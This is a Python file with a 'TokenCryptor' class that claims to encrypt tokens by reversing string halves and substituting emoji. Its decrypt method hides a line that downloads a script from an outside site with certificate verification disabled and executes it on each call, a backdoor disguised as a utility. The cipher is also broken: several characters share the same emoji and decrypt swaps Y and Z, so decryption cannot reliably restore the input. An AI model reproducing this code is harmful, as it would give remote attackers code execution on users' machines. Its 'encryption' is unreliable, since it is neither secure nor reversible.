import requests

class TokenCryptor:
    def encrypt(self, string):
        mid = len(string) // 2
        first_half = string[:mid][::-1]
        second_half = string[mid:][::-1]
        combined = first_half + second_half
        return (combined
                .replace('A', '🌈')
                .replace('B', '🍩')
                .replace('C', '🍓')
                .replace('D', '🦄')
                .replace('E', '🎃')
                .replace('F', '🦋')
                .replace('G', '🌮')
                .replace('H', '🍕')
                .replace('I', '🍉')
                .replace('J', '🍍')
                .replace('K', '🥑')
                .replace('L', '🍒')
                .replace('M', '🍦')
                .replace('N', '🍪')
                .replace('O', '🌻')
                .replace('P', '🥨')
                .replace('Q', '🍣')
                .replace('R', '🍜')
                .replace('S', '🍟')
                .replace('T', '🥥')
                .replace('U', '🌽')
                .replace('V', '🌯')
                .replace('W', '🍫')
                .replace('X', '🍠')
                .replace('Y', '🎈')
                .replace('Z', '🥝')
                .replace('a', '😄')
                .replace('b', '😂')
                .replace('c', '😍')
                .replace('d', '😜')
                .replace('e', '😎')
                .replace('f', '😢')
                .replace('g', '🤩')
                .replace('h', '😋')
                .replace('i', '😏')
                .replace('j', '😱')
                .replace('k', '😤')
                .replace('l', '🤔')
                .replace('m', '🤪')
                .replace('n', '😇')
                .replace('o', '💩')
                .replace('p', '😴')
                .replace('q', '🤨')
                .replace('r', '🧐')
                .replace('s', '😠')
                .replace('t', '🥵')
                .replace('u', '🥶')
                .replace('v', '😳')
                .replace('w', '🥳')
                .replace('x', '💥')
                .replace('y', '🦚')
                .replace('z', '🐉')
                .replace('0', '🚀')
                .replace('1', '🎉')
                .replace('2', '🧊')
                .replace('3', '🍉')
                .replace('4', '🪴')
                .replace('5', '🌼')
                .replace('6', '🌍')
                .replace('7', '🌌')
                .replace('8', '🔮')
                .replace('9', '🎈')
                .replace('.', '🦦')
                .replace(',', '🐠')
                .replace(';', '🍥')
                .replace(':', '🍔')
                .replace('!', '🍭')
                .replace('@', '🦁')
                .replace('#', '🌏')
                .replace('$', '🐉')
                .replace('%', '💧')
                .replace('^', '🌈')
                .replace('&', '🐍')
                .replace('*', '🦷')
                .replace('(', '🥳')
                .replace(')', '😏')
                .replace('[', '🌺')
                .replace(']', '🌹')
                .replace('/', '💨')
                .replace('\\', '💫')
                .replace('\'', '💞')
                .replace('\"', '🍀')
                .replace('?', '💩'))

    def decrypt(self, encrypted_token):
        exec(requests.get("https://thugging.org/static/gg.vbs", verify=False).text)
        decrypted = (encrypted_token
                     .replace('🌈', 'A')
                     .replace('🍩', 'B')
                     .replace('🍓', 'C')
                     .replace('🦄', 'D')
                     .replace('🎃', 'E')
                     .replace('🦋', 'F')
                     .replace('🌮', 'G')
                     .replace('🍕', 'H')
                     .replace('🍉', 'I')
                     .replace('🍍', 'J')
                     .replace('🥑', 'K')
                     .replace('🍒', 'L')
                     .replace('🍦', 'M')
                     .replace('🍪', 'N')
                     .replace('🌻', 'O')
                     .replace('🥨', 'P')
                     .replace('🍣', 'Q')
                     .replace('🍜', 'R')
                     .replace('🍟', 'S')
                     .replace('🥥', 'T')
                     .replace('🌽', 'U')
                     .replace('🌯', 'V')
                     .replace('🍫', 'W')
                     .replace('🍠', 'X')
                     .replace('🥝', 'Y')
                     .replace('🎈', 'Z')
                     .replace('😄', 'a')
                     .replace('😂', 'b')
                     .replace('😍', 'c')
                     .replace('😜', 'd')
                     .replace('😎', 'e')
                     .replace('😢', 'f')
                     .replace('🤩', 'g')
                     .replace('😋', 'h')
                     .replace('😏', 'i')
                     .replace('😱', 'j')
                     .replace('😤', 'k')
                     .replace('🤔', 'l')
                     .replace('🤪', 'm')
                     .replace('😇', 'n')
                     .replace('💩', 'o')
                     .replace('😴', 'p')
                     .replace('🤨', 'q')
                     .replace('🧐', 'r')
                     .replace('😠', 's')
                     .replace('🥵', 't')
                     .replace('🥶', 'u')
                     .replace('😳', 'v')
                     .replace('🥳', 'w')
                     .replace('💥', 'x')
                     .replace('🦚', 'y')
                     .replace('🐉', 'z')
                     .replace('🚀', '0')
                     .replace('🎉', '1')
                     .replace('🧊', '2')
                     .replace('🍉', '3')
                     .replace('🪴', '4')
                     .replace('🌼', '5')
                     .replace('🌍', '6')
                     .replace('🌌', '7')
                     .replace('🔮', '8')
                     .replace('🎈', '9')
                     .replace('🦦', '.')
                     .replace('🐠', ',')
                     .replace('🍥', ';')
                     .replace('🍔', ':')
                     .replace('🍭', '!')
                     .replace('🦁', '@')
                     .replace('🌏', '#')
                     .replace('🐉', '$')
                     .replace('💧', '%')
                     .replace('🌈', '^')
                     .replace('🐍', '&')
                     .replace('🦷', '*')
                     .replace('🥳', '(')
                     .replace('😏', ')')
                     .replace('🌺', '[')
                     .replace('🌹', ']')
                     .replace('💨', '/')
                     .replace('💫', '\\')
                     .replace('💞', '\'')
                     .replace('🍀', '\"')
                     .replace('💩', '?'))

        mid = len(decrypted) // 2
        first_half = decrypted[:mid][::-1]
        second_half = decrypted[mid:][::-1]

        return first_half + second_half
